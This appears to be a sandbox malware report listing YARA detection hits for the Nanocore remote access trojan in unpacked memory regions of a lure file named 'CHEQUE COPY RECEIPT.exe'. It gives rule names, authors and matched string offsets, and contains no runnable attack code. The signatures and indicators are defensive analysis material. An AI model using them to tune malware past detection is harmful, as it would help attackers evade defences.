1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24190:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241bd:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24190:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x2526b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241aa:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.230ba34.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.230ba34.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b9:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287e6:$x2: IClientNetworkHost
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b9:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29894:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287d3:$s5: IClientLoggingHost
12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.24fca54.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
1.2.CHEQUE COPY RECEIPT.exe.24fca54.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
